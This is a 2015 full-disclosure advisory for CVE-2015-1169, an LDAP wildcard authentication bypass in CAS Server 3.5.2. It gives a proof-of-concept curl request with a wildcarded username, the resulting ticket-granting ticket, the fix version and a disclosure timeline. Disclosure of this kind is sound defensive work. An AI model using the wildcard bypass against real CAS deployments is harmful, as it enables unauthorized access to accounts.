| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <CAFCb7ujG562x5DwhF_+zJQCh5om+Ux-4tur6kJWa21QHFR3T6A@mail.gmail.com>
Date: Wed, 21 Jan 2015 12:49:38 -0200
From: "J. Tozo" <juniorbsd@...il.com>
To: oss-security@...ts.openwall.com, fulldisclosure@...lists.org
Subject: [FD] CVE-2015-1169 - CAS Server 3.5.2 allows remote attackers to
bypass LDAP authentication via crafted wildcards.
=====[Alligator Security Team - Security Advisory]========
CVE-2015-1169 - CAS Server 3.5.2 allows remote attackers to bypass LDAP
authentication via crafted wildcards.
Reporter: José Tozo < juniorbsd () gmail com >
=====[Table of Contents]==================================
1. Background
2. Detailed description
3. Other contexts & solutions
4. Timeline
5. References
=====[1. Background]======================================
CAS is an authentication system originally created by Yale University to
provide a trusted way for an application to authenticate a user.
=====[2. Detailed description]============================
A valid username and password required.
Given a username johndoe and a password superpass, you can sucessfully
achieve login using wildcards:
username: jo*
password: superpass
The login will be sucessfully only if the ldap bind search return one
unique member.
The vulnerability described in this document can be validated using the
following example:
Client Request:
root@...hine:/# curl -k -L -d "username=jo%2A&password=superpass"
https://login.cas-server.com/v1/tickets
(note that * was url encoded to %2A)
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
<head>
<title>201 The request has been fulfilled and resulted in a new
resource being created</title>
</head>
<body>
<h1>TGT Created</h1>
<form action="
https://xxx.xxx.xxx.xxx/v1/tickets/TGT-76-ABTSuXWB7sECDGqbe5W4jyxR43YYiTubPsEup9m4gNFpytGSaz"
method="POST">Service:<input type="text" name="service" value=""><br><input
type="submit" value="Submit"></form>
</body>
</html>
Server log:
=============================================================
WHO: [username: jo*]
WHAT: TGT-76-ABTSuXWB7sECDGqbe5W4jyxR43YYiTubPsEup9m4gNFpytGSaz
ACTION: TICKET_GRANTING_TICKET_CREATED
APPLICATION: CAS
WHEN: Tue Jan 20 18:38:17 BRST 2015
CLIENT IP ADDRESS: xxx.xxx.xxx.xxx
SERVER IP ADDRESS: xxx.xxx.xxx.xxx
=============================================================
=====[3. Other contexts & solutions]======================
In order to apply the patch, you have to update at least to version 3.5.3.
Newer versions, such as CAS 4.0.0 and above, are not vulnerable.
=====[4. Timeline]========================================
29/12/14 Vendor notification.
14/01/15 Vendor rolled out new version 3.5.3
17/01/15 Mitre assigned CVE-2015-1169.
21/01/15 Disclosure date.
=====[5. References]=======================================
1 - https://github.com/Jasig/cas/pull/411
2 -
https://github.com/Jasig/cas/commit/7de61b4c6244af9ff8e75a2c92a570f3b075309c
--
Grato,
Tozo
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists